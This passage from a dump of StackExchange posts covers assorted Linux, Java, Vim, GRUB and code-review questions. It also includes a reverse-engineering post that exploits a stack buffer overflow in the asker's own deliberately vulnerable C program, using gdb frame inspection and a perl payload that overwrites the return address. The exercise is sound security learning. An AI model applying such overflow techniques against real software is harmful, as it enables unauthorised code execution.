punctuate[i][0] = athletes.get(i).get(0); punctuate[i][1] = valBike[i][1]; } else { int maxTime = valBike[i][4]; int time = athletes.get(i).get(1); int minTime = valBike[i][8]; int maxPoint = valBike[i][5]; int minPoint = valBike[i][9]; double athletePoint = intLinear(maxTime, time, minTime, maxPoint, minPoint); punctuate[i][0] = athletes.get(i).get(0); punctuate[i][1] = (int) athletePoint; } if (athletes.get(i).get(0) == valRun[i][0]){ // Verify that we are inserting points at right position //if (punctuate[i][0] == valRun[i][0]) { punctuate[i][2] = valRun[i][1]; //} } else { int maxTime = valRun[i][4]; int time = athletes.get(i).get(2); int minTime = valRun[i][8]; int maxPoint = valRun[i][5]; int minPoint = valRun[i][9]; double athletePoint = intLinear(maxTime, time, minTime, maxPoint, minPoint); //if (punctuate[i][0] == valRun[i][2]) { punctuate[i][2] = (int) athletePoint; //} } } for (int i=0; i<punctuate.length; i++) { // total points punctuate[i][3] = punctuate[i][1] + punctuate[i][2]; }return punctuate;}public int[][] ScoreF(int [][] order, int colNum) { for (int row=0; row< order.length; row++){ for (int row2=row+1; row2<order.length; row2++){ // modify acRunding to the column we want to sort if(order[row][colNum]<order[row2][colNum]){ for(int column=0; column<order[0].length; column++) { int temp = order[row][column]; order[row][column] = order[row2][column]; order[row2][column] = temp; } } } } return order;}}and the client class: import java.io.BufferedWriter; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; import java.io.PrintWriter; import java.util.ArrayList; import java.util.Scanner; public class DualthonProof {/** * @param args * @throws IOException */public static void main(String[] args) throws IOException { // ask user name of file Scanner input= new Scanner(System.in); System.out.println(Enter file name bike female:); String bikeF = input.nextLine(); System.out.println(Enter file name female run:); String runF = input.nextLine(); System.out.println(Enter file name male bike:); String bikeM = input.nextLine(); System.out.println(Enter file name male run:); String runM = input.nextLine(); String tabBikeF = bikeF.tab; String tabRunF = runF.tab; String tabBikeM = bikeM.tab; String tabRunM = runM.tab; // if user didn't wrote anything use file if (bikeF.equals()) bikeF = tabBikeF; if (runF.equals()) runF = tabRunF; if (bikeM.equals()) bikeM = tabBikeM; if (runM.equals()) runM = tabRunM; Scanner ficheiro = new Scanner (new FileReader (times.txt)); // Ignore first line ficheiro.nextLine(); ArrayList<ArrayList<Integer>> athleteF = new ArrayList<ArrayList<Integer>>(); ArrayList<ArrayList<Integer>> athleteM = new ArrayList<ArrayList<Integer>>(); while (ficheiro.hasNextLine()) { String row = ficheiro.nextLine(); String[] section = row.split(\t); String[] split1 = section[2].split(:); String[] split2 = section[3].split(:); // Convert string to integer int num1 = Integer.parseInt(split1[0]); int num2 = Integer.parseInt(split1[1]); int secsBike = num1 * 60 + num2; int num3 = Integer.parseInt(split2[0]); int num4 = Integer.parseInt(split2[1]); int secsRun = num3 * 60 + num4; if (section[1].equals(F)) { athleteF.add(new ArrayList<Integer>()); athleteF.get(athleteF.size()-1).add(Integer.parseInt(section[0])); athleteF.get(athleteF.size()-1).add(secsBike); athleteF.get(athleteF.size()-1).add(secsRun); } else if (section[1].equals(M)) { athleteM.add(new ArrayList<Integer>()); athleteM.get(athleteM.size()-1).add(Integer.parseInt(section[0])); athleteM.get(athleteM.size()-1).add(secsBike); athleteM.get(athleteM.size()-1).add(secsRun); } } Scorer ptsF = new Scorer(bikeF, runF, athleteF); int [][] valBikeF = ptsF.valsProximos(bikeF, athleteF, 1); int [][] valRunF = ptsF.valsProximos(runF, athleteF, 2); int [][] pointingF = ptsF.Score(valBikeF, valRunF, athleteF); int [][] sortedF = ptsF.ScoreF(pointingF, 3);} } | Is this correct java? Attributes and constructors especially | java;homework | At first sight, the biggest problem is the double generic lists, like:ArrayList<ArrayList<Integer>> athleteF = new ArrayList<ArrayList<Integer>>();It's really hard to read and error-prone, since the lots of magic numbers which indexes the array. It's easy to mix-up the indexes and hard to remember which index stores which value. Use at least constants instead of the numbers.Anyway, you should create an Athlete class which stores all data of an athlete and store Athlete objects in the list:final List<Athlete> athleteF = new ArrayList<Athlete>();public class Athlete { // TODO: set a proper name for this field private int someDataNeedName; private int secsBike; private int secsRun; public Athlete(final int someDataNeedName, final int secsBike, final int secsRun) { this.someDataNeedName = someDataNeedName; this.secsBike = secsBike; this.secsRun = secsRun; } public int getSomeDataNeedName() { return someDataNeedName; } public void setSomeDataNeedName(final int someDataNeedName) { this.someDataNeedName = someDataNeedName; } public int getSecsBike() { return secsBike; } public void setSecsBike(final int secsBike) { this.secsBike = secsBike; } public int getSecsRun() { return secsRun; } public void setSecsRun(final int secsRun) { this.secsRun = secsRun; }}This class stores its data with names (these are the names of the fields).Usage:final Athlete athlete = new Athlete(Integer.parseInt(section[0]), secsBike, secsRun);if (section[1].equals(F)) { athleteF.add(athlete);} else if (section[1].equals(M)) { ...}(I hope it helps a little bit and somebody has time for a complete review.) |
_unix.57152 | I have a list of 900 URLs. Each page contains one image. Some images are duplicates (with same URL). I want to download 900 images, including duplicates.I was able to download all pages and the embedded images (and ignored all other file types) with wget. But it seems to me that wget ignores an image when it was already downloaded before. So I had 900 pages, but only around 850 images.(How) can I tell wget to download duplicates, too? It could append _1, _2, at the file name.My wget command: wget --input-file=urls.txt --output-file=log.txt --wait 1 --random-wait --page-requisites --exclude-domains code.jquery.com --span-hosts --reject thumbnail*.png -P downloadfolder | How to also download duplicate images? | wget | null |
_unix.19458 | Given a commodity PC, we would like to use it to execute some tasks in the background round the clock.Basically, we would like to have commands like:add-task *insert command here*list-tasksremove-task(s)The added tasks should simply be put in a queue and executed one after another in the background (keeping running after logout of the shell).Is there any simple script/program that does this? | Simple queuing system? | process;process management;scheduling | There's a standard batch command that does more or less what you're after. More precisely, batch executes the jobs when the system load is not too high, one at a time (so it doesn't do any parallelization). The batch command is part of the at package.echo 'command1 --foo=bar' | batch echo 'command2 $(wibble)' | batchat -q b -l # on many OSes, a slightly shorter synonym is: atq -q bat -q b -r 1234 # Unschedule a pending task (atq gives the task ID) |
_vi.10863 | I would like to modify the behavior of one of my mapping but only when Vim is reading data which were piped to it by $ vipe.The mapping closes/quits the current window/session depending on certain conditions. When Vim is reading data which were piped to it, I would like the mapping to execute :cquit, so that it reports an error to the shell and the output of the shell command is not displayed in the terminal when I quit (or the rest of the pipeline is not processed).$ vipe is a shell utility, included in the moreutils package, whose man page contains this:NAME vipe - edit pipeSYNOPSIS command1 | vipe | command2DESCRIPTION vipe allows you to run your editor in the middle of a unix pipeline and edit the data that is being piped between programs. Your editor will have the full data being piped from command1 loaded into it, and when you save, that data will be piped into command2.ENVIRONMENT VARIABLES EDITOR Editor to use. VISUAL Also supported to determine what editor to use.As an example, one could use it to count the number of files/directories in the current working directory with $ ls and $ wc -l, using Vim in the middle to interactively remove some entries:$ ls | vipe | wc -lBut, I don't know how to detect that Vim has been invoked by $ vipe.I tried to use the StdinReadPre and StdinReadPost event like this:augroup standard_input autocmd! autocmd StdinReadPre * nno cd :echo 'hello'<cr> autocmd StdinReadPost * nno cd :echo 'hello'<cr>augroup ENDBut it didn't work, when hitting cd, hello was not displayed.The reason why it didn't worked is probably because Vim wasn't invoked with the - argument, because this works:$ ls | vim -And :h StdinReadPre and :h StdinReadPost seems to confirm this: *StdinReadPost*StdinReadPost After reading from the stdin into the buffer, before executing the modelines. Only used when the - argument was used when Vim was started |--|. *StdinReadPre*StdinReadPre Before reading from stdin into the buffer. Only used when the - argument was used when Vim was started |--|.I also tried to check the contents of the internal variables v:progname and v:progpath but they both report vim, not vipe.Is there a way to detect whether Vim has been invoked by another shell command (vipe, git commit, ...)? | How to detect whether Vim has been invoked by another shell command? | autocmd;invocation;startup;quit | Since vipe, git commit (and many other programs which invoke an editor) use the VISUAL and EDITOR variables (unless you specify an editor for git with git config core.editor), you can use that variable to invoke Vim in such a way that you can detect it:export EDITOR='env called=1 vim'Then, in Vim, $called will have a value of 1, which you can use to detect whether it was called by a command. |
_unix.30798 | In the package that I'm building, there are symbolic links within the Buildroot directory. For instance this: /home/sg/impkg/buildroot/dir1/bin/w_be -> /home/sg/impkg/buildroot/dir2/targ/beThis is making rpmbuild to fail with the error: RPM build errors: Symlink points to BuildRoot: /home/sg/impkg/buildroot/dir1/bin/w_be -> /home/sg/impkg/buildroot/dir2/targ/beIn my %files section, I have only included the buildroot directory, which is what I want. Following is a snippet from my spec-file:Summary: research compiler tool setLicense: GPLName: %{name}Version: %{version}Release: %{release}Source: %{name}-%{version}.tar.gzPrefix: /usrGroup: Development/ToolsAutoreq: 0Autoprov: 0%descriptionresearch compiler tool set%prep%setup -q%buildrm -rf %{buildroot}/%{name}-%{version}mkdir %{buildroot}/%{name}-%{version}cd %{buildroot}/%{name}-%{version} && %{_builddir}/%{name}-%{version}/./configure -- prefix=%{buildroot}/%{name}-%{version}make %{?_smp_mflags} -C %{buildroot}/%{name}-%{version}%installcd %{buildroot}/%{name}-%{version} && make DESTDIR=%{buildroot}/%{name}-%{version} install%cleanrm -rf %{buildroot}/%{name}-%{version}%files%defattr(755,-,-)/%{name}-%{version}I have to adhere to the logic, which means I cannot remove these links from the Makefiles...how do I solve this problem and generate the RPM? | rpmbuild error: Symlink points to BuildRoot | rpm | null |
_unix.315636 | Maximalize window on Linux Mint 18 xfce not working when I use left mouse button and only when my window is on half screen, but when I use right mouse button it works. | Maximalize window on Linux Mint 18 xfce not working | xfce;window manager | null |
_unix.288063 | What's the difference between nohup foocommand and nohup foocommand &? I understand that & marks the task/job/process as running in the background but does that make it more resilient than it would otherwise be? What happens in both scenarios if my SSH session timeouts or if I get disconnected? | What happens if I don't use & at the end of a nohup command? | centos;nohup | null |
_webmaster.8633 | I'm currently not using any sort of fancy stat tracking software such as feedburner, but I occasionally look at Google's stats in their Webmaster Tools just to get a rough idea of whether the number of subscribers is going up or down. This only gives the number of users subscribed through Google products, as they explain in their help documents:Subscriber stats display the number of Google users who have subscribed to your feeds using any Google product (such as Reader, iGoogle, or Orkut). Because users can subscribe to feeds using many different aggregators or RSS readers, the actual number of subscribers to your site may be higher.I used to use Google Reader very regularly but haven't opened it in a while now. The way I understand it, this will mean that even though I haven't touched any of those feeds in a long time I'm still technically subscribed to them and will therefore be included in Google's statistic. Is this correct? Also since Google runs Feedburner, does this have any effect on their stats as well? | Do Google's feed statistics include former users? | google;statistics;feeds | null |
_cstheory.21891 | Given a $n\times m$ grid, let the bottom-left vertex be $s$ and the top-right vertex be $t$.Given $k$ non-consecutive edges on the upper horizontal line of the grid, I want to find an upper bound on the number of simple $st$-path using those edges.If I see the grid as a box in the plane, I can visualize an $st$-path as a rectilinear curve cutting this box. In this way I can associate each cell of the grid to either one or the other partition, getting as a trivial upper bound the value of $2^{n^2}$.Is there any better?I also thought that, if I am considering only the paths using the $k$ given edges on the upper line, then I can map each of these paths to a cut of the grid graph into $k+1$ partitions.Do you know whether any non-trivial upper bound on this number is known?Thanks for the help! | Number of $k$-cuts of grid graphs | graph theory;planar graphs;upper bounds | Consider this variation: we want to find number of paths which goes from $(1,1)->(n-2,n)$ in $(n-2)\times n$ solid grid, this can be done in almost $2^{n(n-2)}$ possible ways. Then is simple to convert it to your case. Just go up one step, then go left $n$ steps, again up one step and then right $n$ steps. That path covers all of that $k$ edges, and these are just restricted versions, that means independent to $k$, the upperbound is big : $2^{O(n^2)}$. |
_unix.26834 | I have a RedHat Linux server and I'm trying to make a copy of /var/lib/mysql/ibdata1, but I'm receiving an error saying permission denied and the file cannot be opened.I'm logged in as root user and tried to use sudo cp...Any idea of what I'm doing wrong? Sorry for my ignorance, but I don't know much about Unix systems. I was trying sudo su mysql to make the copy, then it asks for a password that should be the one I have, but it is saying it's wrong! | Can't make a copy of /var/lib/mysql/ibdata1 | rhel;sudo;mysql;cp | null |
_codereview.63518 | I am trying to implement a program which can convert number into words. My code can convert numbers between 0 - 999. It uses recursive function calls and simple arithmetic operations. Can you please review it and give me your feedback?I used three different vectors to store words such as Six and Eleven and then access there indexes according to your input.numberToWord.h#ifndef numberToWord_H#define numberToWord_H#include <vector>#include <string>class numbertoword{public: numbertoword(); ~numbertoword(){};public: std::vector<std::string> one2nine; std::vector<std::string> elevent2ninteen; std::vector<std::string> twoDigit; std::vector<std::string> threeDigit;public: void initialize(); void convert(int number); int countNumber(int number); void calculate(int number, int count); void display(int digit);private: int xN, yN; int originalNumber;};#endifSource.cpp#include <iostream>#include numberToWord.hnumbertoword::numbertoword() : xN(0), yN(0), originalNumber(0){}void numbertoword::initialize(){ //one to nine one2nine.push_back(Zero); one2nine.push_back(One); one2nine.push_back(Two); one2nine.push_back(Three); one2nine.push_back(Four); one2nine.push_back(Five); one2nine.push_back(Six); one2nine.push_back(Seven); one2nine.push_back(Eight); one2nine.push_back(Nine); //eleven to ninteen elevent2ninteen.push_back(Eleven); elevent2ninteen.push_back(Twelve); elevent2ninteen.push_back(Thirteen); elevent2ninteen.push_back(Fourteen); elevent2ninteen.push_back(Fifteen); elevent2ninteen.push_back(Sixteen); elevent2ninteen.push_back(Seventeen); elevent2ninteen.push_back(Eighteen); elevent2ninteen.push_back(Nineteen); //TwoDigit twoDigit.push_back(Ten); twoDigit.push_back(Twenty); twoDigit.push_back(Thirty); twoDigit.push_back(Forty); twoDigit.push_back(Fifty); twoDigit.push_back(Sixty); twoDigit.push_back(Seventy); twoDigit.push_back(Eighty); twoDigit.push_back(Ninety); //threeDigit threeDigit.push_back(Hundred);}void numbertoword::display(int digit){ if( originalNumber < 10) { std::cout<< one2nine[digit]<< ; } else if( originalNumber < 20) { std::cout<< elevent2ninteen[digit - 1]<< ; } else if( originalNumber < 100) { std::cout<< twoDigit[digit - 1]<< ; } else if( originalNumber < 1000) { std::cout<<one2nine[digit]<< <<threeDigit[0]<< ; }}void numbertoword::calculate(int number, int count){ if( number < 10) { display(number); return; } xN = number / count; yN = number - (xN * count); if( number < 20 && number != 10) { display (yN ); return; } else if(number < 100 && yN == 0) { display( xN ); return; } else if(number < 100 ) { display( xN ); } else if(number < 1000 && yN == 0) { display(xN); return; } else if(number < 1000 ) { display(xN); } originalNumber = yN; count = countNumber(originalNumber); calculate(yN, count);}int numbertoword::countNumber(int number){ int c = 1; while( number > 9) { number = number / 10; c *= 10; } return c;}void numbertoword::convert(int number){ initialize(); originalNumber = number; int c = countNumber(number); calculate(number, c);}int main(){ numbertoword n2w; n2w.convert(999); std::cin.get(); return 0;} | Convert number into words | c++;c++11;converting;numbers to words | numberToWord.hConsider renaming numbertoword to NumberToWord. This uses a naming convention referred to as PascalCase, which is different from your variables and functions. Also notice that the compound words have been emphasized. This makes it easier for others to read the full name.Since you're not using your own destructor, you can just leave it out. The compiler will provide one for you that should be suitable.These names make no sense to me:int xN, yN;Unless these shortened names are obvious in the program, they should be spelled-out entirely so that others can understand them. It may also benefit you in case you ever forget what they mean.Source.cppElaborating on what @vnp has mentioned about initializer lists, you can use it in place of the multiple calls to push_back():one2nine { one, two, three /* ... */ };Moreover, consider renaming the vector to oneToNine, which is less-awkward of a name. Apply this to the other similar names as well.Better yet (regarding the use of vectors), you can use std::array instead. It would be better-suited for this task as you're not needing a dynamic data structure here.This can be simplified:number = number / 10;by using the /= operator:number /= 10;With the existing curly braces, these should be on separate lines:display(number); return;You should be doing input-validation with this. If the user inputs a non-numerical value or a value below 0 or above 999, the program should display an appropriate error message and then terminate.This program can be made more usable by accepting command line arguments:int main(int argc, char* argv[]){ int number; // the file name is considered an argument if (argc > 1) { number = std::atoi(argv[1]); } // only file name given else if (argc == 1) { std::cin >> number; } // ...}(std::atoi() requires <cstdlib>)It would make more sense to construct numbertoword objects with the original number, rather than passing it to convert(). The function has no business doing that, and this initialization should only be done by the constructor. The function should also no longer take arguments.numbertoword n2w(999);n2w.convert();In order for this to work, you should replace the default initializer list with one that takes an argument:numbertoword::numbertoword(int originalNumber) : xN(0) , yN(0) , originalNumber(originalNumber){}(I've rearranged the list so that it's easier to maintain the data members.) |
_unix.303280 | I installed Ubuntu 16.04 on an ASUS Z450LA laptop, that has Intel HD5500 integrated graphics.The brightness up/down keys (Fn+F5/F6) don't work; however, if I use my desktop environment to control the brightness, it works, however is annoying to not have the easy way to control brightness.When I use xev, it shows that these keys are not generating events; it's as if the system doesn't detect them at all.What to do?The content of /sys/class/backlight:/sys/class/backlight$ lsintel_backlightand within the intel_backlight directory, has:actual_brightnessbl_powerbrightnessdevice -> ../../card0-eDP-1max_brightnesspowersubsystem -> ../../../../../../../class/backlighttypeuevent | Brightness up/down keys don't work | ubuntu;laptop;brightness | null |
_unix.304073 | Since the specific limits at which the file system fails depends on the OS, we have a test that validates just that we can get up to 500 entries on an ACL, and that 4000 entries fails (should fail on all UNIX platforms at that level), this test has been working for a long time on different architecture and os version.Recently while running the test on:cat /etc/os-releaseNAME=SLESVERSION=12-SP1VERSION_ID=12.1PRETTY_NAME=SUSE Linux Enterprise Server 12 SP1ID=slesANSI_COLOR=0;32CPE_NAME=cpe:/o:suse:sles:12:sp1and filesystem type:cat /etc/fstab UUID=61e7-43bb-8cdc-80a3718e27b9 / xfs defaults 1 1it passes and able to set ACL upto 4000 and doesn't complain, so I wanted to know whether OS allows for this file system to have this many acls and what's the limit? | Limit of ACL on x86 sles12 file system type xfs | acl;sles;x86;xfs | Xfs had a limit of 25 ACL entries for a long time but the limit was lifted in kernel 3.11. For xfs v5 or later, the limit is now as many as fit in the extended attribute list (64kB), which at 12 bytes per entry means 5460 entries if there are no other extended attributes (e.g. no SELinux context).I think some Linux filesystems can compress most ACL entries down to 4 bytes which would allow a little under 16384 entries.I don't understand why you'd test that there is a maximum number of ACL entries. This is not something you can count on. At any time the number could become effectively unlimited. |
_webmaster.25741 | I have a question, let's say I have <input type=file name=image />. Will the text of the button will change if user will have different language as his system default one? If so than how can I force this button to use English by default? | input type=file default language is system language? | html;browsers;language;operating system | The only way to change this is by replacing the button, (e.g. with SWFUpload) but I don't see why you would want to.You shouldn't change the user's system language. They've chosen their system language for a reason, and there's an expectation that their UI will be rendered in this language that they can read/understand. |
_unix.346060 | I'm newbie with networking, working on OSX and a little bit meticulous... for instance.I simply open an http server from my terminal (with node) listening on port 3000, which is obviously working if I request localhost:3000 in a browser. Now, I want to see this connection so I use netstat.I'm supposed to see server connection on port 3000, and client connection on another port: $ netstat -p tcpProto Recv-Q Send-Q Local Address Foreign Address (state) tcp6 0 0 localhost.hbci localhost.50215 ESTABLISHEDtcp6 0 0 localhost.50215 localhost.hbci ESTABLISHEDtcp6 0 0 localhost.hbci localhost.50214 ESTABLISHEDtcp6 0 0 localhost.50214 localhost.hbci ESTABLISHEDtcp6 0 0 localhost.hbci localhost.50213 ESTABLISHEDtcp6 0 0 localhost.50213 localhost.hbci ESTABLISHEDtcp6 0 0 localhost.hbci localhost.50211 ESTABLISHEDtcp6 0 0 localhost.hbci localhost.50212 ESTABLISHEDtcp6 0 0 localhost.50212 localhost.hbci ESTABLISHEDtcp6 0 0 localhost.50211 localhost.hbci ESTABLISHEDtcp6 0 0 localhost.hbci localhost.50210 ESTABLISHEDtcp6 0 0 localhost.50210 localhost.hbci ESTABLISHEDNo entries about the server connection on port 3000. But the localhost.hbci, switching from a local to a foreign address, seems to be my server connection.And if I type: $ lsof -i TCP:3000COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAMEnode 1144 garysounigo 11u IPv6 0x6d9a12e1e288efc7 0t0 TCP *:hbci (LISTEN)I'm sure that hbci represent my port 3000. Does anyone know something about what hbci means or refers to?Is it a port for local server ? A protocol for s local connection?I find anythings everywhere ( on any port.. ;) ) | TCP *:hbci (LISTEN) - What hbci mean? | linux;tcp;netstat | Does anyone know what hbci means or refers to?HBCI stands for Home Banking Computer Interface, see http://openhbci.sourceforge.net/. The same port number is also used by the RemoteWare Client, at least according to http://www.networksorcery.com/enp/protocol/ip/ports03000.htm.The reason you are seeing it is because netstat and similar utilities look up port numbers in a database that maps them to symbolic names (usually, /etc/services).To suppress this behavior in netstat, one can pass the --numeric-ports option, or just -n which also makes some other things numeric. |
_unix.197706 | My team and I will soon begin studying and practicing for the nation-wide Cyber Patriot program. As I'm famed for being our Linux guy, I would really like to improve my knowledge on the subject. Does anyone have any recommendations as to where to start? Generally with an emphasis on securing Linux machines. I have a machine running linux, but I don't know the ins and outs of the OS. | How can I study Linux, in and out? | linux;security | null |
_unix.267933 | I did a dist-upgrade from 4.3.0-kali1-amd64 to 4.4.0-kali1-amd64 but when I restart, the screen stucks at 'Loading initial ramdisk ...'. I had to use the advanced boot options to boot using 4.3.0-kali1-amd64 to be able to boot instead.What can I do to fix the problem?I am running kali linux on dual boot with windows 7. Kali is running on an encrypted LVM. | Cannot boot kali linux after dist-upgrade, stucks at 'Loading initial ramdisk ...' | linux;boot;kali linux;initramfs;initrd | null |
_reverseengineering.11020 | I understand the principles of exploiting a classical stack-based buffer-overflow, and now I want to practice it. Therefore I wrote the following test-application:#include <stdio.h>#include <string.h>#include <unistd.h>void public(char *args) { char buff[12]; memset(buff, 'B', sizeof(buff)); strcpy(buff, args); printf(\nbuff: [%s] (%p)(%d)\n\n, &buff, buff, sizeof(buff));}void secret(void) { printf(SECRET\n); exit(0);}int main(int argc, char *argv[]) { int uid; uid = getuid(); // Only when the user is root if (uid == 0) secret(); if (argc > 1) { public(argv[1]); } else printf(Kein Argument!\n);}When the user which starts the program is root, the method secret() is being called, otherwise, the method public(...) is being called.I am using debian-gnome x64, so I had to compile it specifically to x86 to get x86-assembly (which I know better than x64).I compiled the program with gcc: gcc ret.c -o ret -m32 -g -fno-stack-protectorTarget:I want to call the method secret() without being a root-user. {To do that I have to overwrite the Return Instruction Pointer (RIP) with the address of the function secret()}Vulnerability:The method public(...) copies the program-args with the unsafe strcpy() method into the char-array buff. So it is possible to overwrite data on the stack, when the user starts the program with an arg > 11, where arg should be the length of the string-arg.Required Information:The address of the function secret().The address of the first buffer's first element. Due to ASCII-Encoding I know that each char has a size of 1 byte, so that the buffer's last element is 12 bytes ahead the first element.The address of the RIP, because I have to overwrite it secret()s address.OPTIONAL: It also helps to know the address of the Safed Frame Pointer (SFP).Methodical approach:Load the program into gdb: gdb -q ret.To get an overview of the full stack-frame of the method public(...) I have to set a breakpoint there, where the function-epilogue starts. This is at the enclosing brace } at line 11.Now I have to run the program with a valid arg: run A.At the breakpoint, I now want to view the stack-frame.(gdb) info frame 0Stack frame at 0xffffd2f0: eip = 0x804852d in public (ret.c:11); saved eip = 0x804858c called by frame at 0xffffd330 source language c. Arglist at 0xffffd2e8, args: args=0xffffd575 A Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0 Saved registers: ebp at 0xffffd2e8, eip at 0xffffd2ecBecause from that I can gather the following information:The RIP is located at 0xffffd2ec and contains the address 0x804858c which contains the instruction 0x804858c <main+61>: add $0x10,%esp.The SFP is located at 0xffffd2e8.Now I need the address, where the secret()-function starts:(gdb) print secret$2 = {void (void)} 0x804852f Last, but not least I get the buffer's address:(gdb) print/x &buff$4 = 0xffffd2d4To sum it up:RIP is at 0xffffd2ec.SFP is at 0xffffd2e8.buff is at 0xffffd2d4.This means that I would have to run the program with 0xffffd2ec - 0xffffd2d4 + 0x04 = 28 bytes (= chars).So, to exploit it I'd have to run the program with an arg which is 28 bytes long whereas the last 4 bytes contain the address of the function secret() (and pay attention to little-endian-ordering):(gdb) run `perl -e '{print Ax24; print \xec\d2\ff\ff; }'`The program being debugged has been started already.Start it from the beginning? (y or n) yStarting program: /home/patrick/Projekte/C/I. Stack_Overflow/ret `perl -e '{print Ax24; print \xec\d2\ff\ff; }'`buff: [AAAAAAAAAAAAAAAAAAAAAAAAd2 f f] (0xffffd2b4)(12)Program received signal SIGSEGV, Segmentation fault.0x0c3264ec in ?? ()Two questions are rising up:Why is it not working. This example is basically from an older book I'm reading. But theoretically it should work so I think....Why is between buff and the SFP a 8-byte gap? What does this memory-area contain?EDIT: That's a download-link to the binary. | Writing an exploit for sample-application | c++;gdb;c;exploit;stack | Why is it not working. This example is basically from an older book I'm reading. But theoretically it should work so I think....It's because you're overwriting the return address on the stack with 0xffffd2ec instead of 0x0804852f (the latter is the address for secret()).If you thus use '{print Ax24; print \x2f\85\04\08; }' instead, it should work.Why is between buff and the SFP a 8-byte gap? What does this memory-area contain?That gap is probably because of attempted optimizations made by gcc. The memory-area contains nothing (well, technically it contains 8 bytes whose values are indeterminate) and the code in the public() function neither reads from nor writes to that memory-area. |
_unix.287654 | Problem statement: I want to extract an unknown string(last string) from a given path name in a single line command.Restrictions: The path is dynamic and can change with users input.Only last string is to be extracted using only one line o command.Sample:Eg1:/home/xyz/Desktop/toolsIn this case, I need to just extract the word tools.Eg2:/tmp/my_directory/my_big_dir/my_small/dir/crossIn this again, I need to extact the last string crossIs there a way to do this?I tried to use cut command but it didn't work as the path length is dynamic. | Extract string from a path | shell script | I think basename is the command you are looking for.[me@host ~]# basename /home/xyz/Desktop/toolstools |
_unix.276467 | I am trying to start my python web.py server at boot, but I am having difficulties getting it running by itself.I have a config-file like the following. It's basically the sample file with an added program. The file lives in /etc/supervisor/conf.d/ and is called supervisord.conf[unix_http_server]file=/tmp/supervisor.sock[supervisord]logfile=/tmp/supervisord.loglogfile_maxbytes=50MBlogfile_backups=10loglevel=infopidfile=/tmp/supervisord.pidnodaemon=falseminfds=1024minprocs=200[rpcinterface:supervisor]supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface[supervisorctl]serverurl=unix:///tmp/supervisor.sock[program:server]directory = /home/pi/Server/command = python server.pyautostart = trueautorestart = trueuser = pienvironment=HOME=/home/pi, USER=pistdout_logfile = server-stdout.logstdout_logfile_maxbytes = 10MBstdout_logfile_backups = 5stderr_logfile = server-stderr.logstderr_logfile_maxbytes = 10MBstderr_logfile_backups = 5Now when I am rebooting my raspberry and open up supervisorctl I see the error: error: <class 'socket.error'>, [Errno 111] Connection refused: file: /usr/lib/python2.7/socket.py line: 571I managed to get it running if I cd into ~/Server where my server.py file is located and also copy the supervisord.conf there, then sudo service supervisor restart and sudo supervisord -c supervisord.conf.Now my server is running like it should...But I need my server to automatically at boot. I guess it's a problem with being root user vs. not or something like that... | Start my webpy server using supervisor | python;supervisord | null |
_cs.74407 | I am studying about set cover problem and wondering that which problems in real world can be solved by set cover. I found that IBM used this problem for their anti-virus problem, so there should be many more others that can be solved by set cover. | What are the real world applications of set cover problem? | graphs;graph theory;set cover | null |
_unix.43162 | I have a small custom embedded Linux distribution (created with OpenEmbedded), which boots with GRUB 1.99. The aim is to have it start up fast.Currently it says:GRUB loading.for ~2+ seconds (this is probably unavoidable). Then:Welcome to GRUB!under it for a fraction of a second when it has finished loading.(There is no menu or menu timeout.) It clears the screen, then:Booting 'Disk'for ~8 seconds. This delay seems like it should be avoidable. I'd very much like to know how to make it not delay here.Then it continues on to:Decompressing Linux... Parsing ELF... done.Booting the kernel.And then lots of fast scrolling text as the kernel boots.The kernel image file is 1.8MB, and the disk image file is 16MB.The grub.cfg file looks like:set default=0set timeout=0menuentry Disk { set root=(hd0,1) linux /boot/Disk.kernel parport=0x378,7,3 ramdisk_size=16384 root=/dev/ram rw initrd /boot/Disk.ext2}In another boot disk I have (on a Compact Flash card), I have exactly the same kernel, and a different disk image file, which 20MB. The config file is also identical, except that ramdisk_size=20480. This one has an extremely long delay of 69 seconds at that same point. Why is it so much longer? Thankfully, I don't need to use that boot disk often. But it would be nice to fix that one too, since presumably the delay is caused by the same thing.How do I fix this delay? What is it doing? How does one go about debugging a bootloader? Is it worth looking into a lighter weight bootloader like SYSLINUX instead? Will deleting some of the unused GRUB 2 modules improve it? (How does one find which modules are unused?)SummaryAll of the following have the exact same Linux 3.2 kernel:Flash disk A on computer X: 16MB image, GRUB 1.99, boot delay is ~8s; disk A's read speed is 20MB/s.Flash disk B on computer X: 20MB image, GRUB 1.99, boot delay is 69s; disk B's read speed is 20MB/s.Flash disk C on computer Y: 16MB image, GRUB 0.97, boot delay is.. extremely quick; disk C's read speed is 16MB/s.Note that computer Y is similar to computer X, but a bit slower.(The monitor is not even fast enough to show any GRUB screens at all. From the point of the BIOS screen disappearing to the Linux kernel loading screen first appearing, it shows 4.76s of blank screen - but the Linux kernel has already been loading for at least 1.5s by that time, so it's more like 3.2s at a maximum for GRUB to do its thing. This includes GRUB itself loading and BIOS deciding which drive to boot from, etc.)Unfortunately GRUB 0.97 like that instance is not able to be repeatably built like that, so it doesn't seem like a feasible option (although it would be nice).How do I make GRUB 2 fast?? | Why is GRUB 2 booting so slowly? | boot;grub2;embedded;boot loader | I didn't find the cause of the slow booting with GRUB 2.I ended up using EXTLINUX instead, which is compact and fast, and better-suited if you don't need all the fancy GRUB 2 things.http://www.syslinux.org/wiki/index.php/EXTLINUX |
_codereview.51805 | The problem statement can be found here. In short, here's what the problem is about:You're given a set of numbers and you need to find whether the the numbers are ordinary or psycho. For a number to be psycho, its number of prime factors that occur even times should be greater than the number of prime factors that occur odd number of times. Else, it's ordinary.My solution for this is as follows:First, I initialize the Sieve of Eratosthenes. This is the fastest method I know to get a list of prime numbers.Next, I loop over all the test cases and loop over all it's factors that are prime to increment the even and odd counter, to finally compare them and find the answer. For this I have to loop from 0 to half of the number.This algorithm of mine is \$O(n)\$ for one input. Since the input size is of the order of \$10^7\$ and the number of inputs of the order of \$10^6\$ my algorithm takes time of the order of \$10^{13}\$. I need help with reducing this time.#include <cstdio>using namespace std;bool primes[5000000];void erastho(){ for (int i = 0; i < 5000000; i++) { primes[i] = 1; } primes[0] = 0; primes[1] = 0; for (int i = 2; i < 3164; i = i + 1) { if (primes[i]) { int p = i*2; while(p < 5000000) { primes[p] = 0; p = p + i; } } else continue; }}int main(){ erastho(); int t; scanf(%d, &t); while(t--) { int n; scanf(%d, &n); int hal = n/2; int v, ev = 0, od = 0; for (int i = 2; i <= hal; i++) { if((primes[i]) && (n%i == 0)) { while (n%i == 0) { n 